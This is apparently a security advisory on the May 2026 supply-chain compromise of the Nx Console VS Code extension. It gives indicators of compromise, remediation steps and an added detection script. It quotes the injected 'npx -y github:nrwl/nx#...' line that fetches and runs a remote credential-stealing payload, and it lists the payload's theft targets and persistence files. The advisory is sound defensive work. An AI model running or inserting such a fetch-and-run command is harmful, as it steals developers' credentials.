This is a developing story. We will update this post with additional findings and detailed payload analysis, as our investigation continues.
Summary
On May 18, 2026, we identified that Nx Console (nrwl.angular-console), a popular VS Code extension with over 2.2 million installations, was compromised. Version 18.95.0 published to the VS Code Marketplace contains malicious code that executes an obfuscated payload upon workspace activation. The prior version (18.94.0) and the remediation version (18.100.0) are not affected.
This is the second major supply chain attack against the Nx ecosystem in less than a year. In August 2025, the "s1ngularity" attack compromised the nx npm package and several plugins, exfiltrating developer credentials via a malicious postinstall script. See our prior analysis.
What Happened
Version 18.95.0 of the Nx Console VS Code extension was published to the VS Code Marketplace outside the project's normal CI/CD pipeline, likely using stolen publishing credentials (VSCE_PAT). The malicious version injects code into the extension's main.js that runs npx -y github:nrwl/nx#558b09d7... on every workspace activation. This references a dangling orphan commit on the nrwl/nx GitHub repository containing a ~498 KB obfuscated JavaScript payload.
Key observations:
- Version 18.95.0 does not have a corresponding GitHub release — it was published directly to the marketplace, bypassing CI/CD.
- The malicious commit on nrwl/nx is unsigned, has no parent commits (orphan), and is not reachable from any branch.
- The commit is attributed to a developer account that is no longer a public member of the nrwl GitHub organization. All recent legitimate commits from this account are GPG-signed; the malicious commit is not.
- The commit message reads "Don't delete this commit before 24 hours or wiper activates" — social engineering intended to delay incident response.
- Open VSX was not affected — the malicious version was only published to the VS Code Marketplace.
Payload Capabilities
Our static analysis of the obfuscated payload reveals a sophisticated, multi-stage credential stealer and exfiltration tool. Key capabilities include:
- Credential theft targeting GitHub, NPM, AWS, HashiCorp Vault, Kubernetes, 1Password, SSH keys, and database connection strings
- Three exfiltration channels: HTTPS to a C2 server on port 443, GitHub API-based exfiltration, and DNS tunneling
- Sigstore attestation forgery: ability to steal OIDC tokens and forge SLSA provenance to publish maliciously-signed npm packages
- Persistence mechanisms: macOS LaunchAgent (com.user.kitty-monitor.plist), Python backdoor (cat.py), and Bun-based scripts
- CI/CD targeting: GitHub Actions runner memory scraping and privilege escalation via sudoers manipulation
- Anti-analysis features: geolocation filtering, self-daemonization, and multi-layer obfuscation (obfuscator.io + PBKDF2-encrypted strings)
This is notably the second major supply chain attack against the Nx ecosystem in less than a year. The first occurred in August 2025 (GHSA-cxm3-wv7p-598c), targeting npm packages directly.
Who Is Affected
You may be affected if:
- You use VS Code, Cursor, or any VS Code-based editor with the Nx Console extension installed
- Your extension auto-updated to version 18.95.0 on May 18, 2026
- You opened any workspace after the update was applied
What You Should Do
- Check your extension version: Run code --list-extensions --show-versions | grep angular-console. If you see version 18.95.0, you are affected.
- Update immediately to version 18.100.0 or later.
- Check for persistence: Look for ~/.local/share/kitty/cat.py and ~/Library/LaunchAgents/com.user.kitty-monitor.plist on your system. Remove them if found.
- Rotate all credentials: GitHub tokens, NPM tokens, SSH keys, AWS credentials, cloud CLI credentials, HashiCorp Vault tokens, and any API keys accessible from your machine or CI/CD environment.
- Audit CI/CD environments: If you use GitHub Actions with Nx, review recent workflow runs for unexpected artifacts, commits, or secret access.
- Review npm packages: If you publish npm packages, check for unauthorized versions that may have been published using stolen tokens.
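The checks above, collected into one script as an added example (this is not code from the advisory or from the Nx project): it flags the malicious extension version, looks for the out-of-band npx invocation in an installed main.js, and lists the persistence paths named in this post. It assumes the code CLI is on PATH and the default ~/.vscode/extensions layout.

```shell
#!/bin/sh
# Added example, not code from the advisory or the Nx project. Assumes the
# `code` CLI is on PATH and extensions live under ~/.vscode/extensions
# (the default layout); all indicator strings come from the advisory text.

EXT_ID="nrwl.angular-console"
BAD_VERSION="18.95.0"

# Takes the output of `code --list-extensions --show-versions` (one
# publisher.name@version per line); returns 0 if the malicious version is listed.
nx_console_affected() {
    printf '%s\n' "$1" | grep -qx "${EXT_ID}@${BAD_VERSION}"
}

# Takes a path to an extension's main.js; returns 0 if it contains the
# out-of-band `npx -y github:nrwl/nx#...` invocation the advisory describes.
main_js_has_injected_npx() {
    grep -q 'npx -y github:nrwl/nx#' "$1"
}

# Prints the advisory's persistence indicators present under the given home
# directory (plus /tmp/kitty-*); returns 0 if any was found, 1 otherwise.
find_persistence() {
    found=1
    for p in "$1/.local/share/kitty/cat.py" \
             "$1/Library/LaunchAgents/com.user.kitty-monitor.plist" /tmp/kitty-*; do
        [ -e "$p" ] && { printf '%s\n' "$p"; found=0; }
    done
    return $found
}

# Stand-alone use on a workstation: sh nx-console-check.sh --run
if [ "${1:-}" = "--run" ]; then
    if command -v code >/dev/null 2>&1 &&
       nx_console_affected "$(code --list-extensions --show-versions 2>/dev/null)"; then
        echo "AFFECTED: $EXT_ID@$BAD_VERSION installed; update to 18.100.0+ and rotate credentials"
    fi
    find "$HOME/.vscode/extensions" -path "*/${EXT_ID}-*" -name main.js 2>/dev/null |
    while read -r js; do
        main_js_has_injected_npx "$js" && echo "Injected npx invocation in $js"
    done
    find_persistence "$HOME" && echo "Persistence indicators listed above; remove them and rotate credentials"
fi
```

A clean result from this script does not prove a machine was never exposed; if 18.95.0 was ever installed and a workspace opened, treat credentials as compromised and rotate them.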
Indicators of Compromise
File Hashes (SHA-256)
- Malicious VSIX (v18.95.0): 1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8
- Malicious main.js: b0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74
- Obfuscated payload (index.js): e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1
File System Indicators
- ~/.local/share/kitty/cat.py
- ~/Library/LaunchAgents/com.user.kitty-monitor.plist
- /tmp/kitty-* directories
Network Indicators
- api.github.com/search/commits?q=firedalazer (C2 polling)
- Connections to AWS IMDS (169.254.169.254) from non-AWS environments
This is a developing story. We will update this post with additional findings, including full MITRE ATT&CK mapping and detailed payload analysis, as our investigation continues.
References
- GitHub Issue #3139
- GHSA-c9j4-9m59-847w
- Nx Console on VS Code Marketplace
- Malicious dangling commit on nrwl/nx
